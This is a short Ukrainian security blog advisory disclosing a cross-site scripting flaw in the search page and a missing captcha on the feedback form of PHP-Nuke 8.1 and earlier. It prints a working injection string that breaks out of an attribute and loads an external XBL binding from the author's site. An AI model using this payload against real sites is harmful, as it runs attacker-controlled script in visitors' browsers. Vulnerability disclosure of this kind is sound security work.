Websecurity - Веб безпека

28.10.2010

У березні, 21.03.2010, я знайшов Cross-Site Scripting та Insufficient Anti-automation уразливості в PHP-Nuke. Які я виявив на одному сайті, а нещодавно перевірив їх на офіційному сайті phpnuke.org. Про що найближчим часом повідомлю розробникам.

Раніше я вже писав про уразливість в PHP-Nuke.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам системи.

11.01.2011

XSS:

POST запит на сторінці http://site/modules.php?name=Search

" style="-moz-binding:url('http://websecurity.com.ua/webtools/xss.xml#xss')

В полі пошуку.

Це версія для Mozilla та Firefox (до 3.0), використовуючи MouseOverJacking можна зробити версію для всіх браузерів.

Insufficient Anti-automation:

http://site/modules.php?name=Feedback

В формі немає захисту від автоматизованих запитів (капчі).

Уразливі PHP-Nuke 8.1 та попередні версії (перевірено в PHP-Nuke 8.0 та 8.1).

Дані уразливості досі не виправлені розробниками PHP-Nuke - ні в своїй системі, ні в себе на сайті.

This entry was posted on 15:01 11.01.2011 and is filed under Уразливості. You can follow any responses to this entry through the RSS 2.0 feed.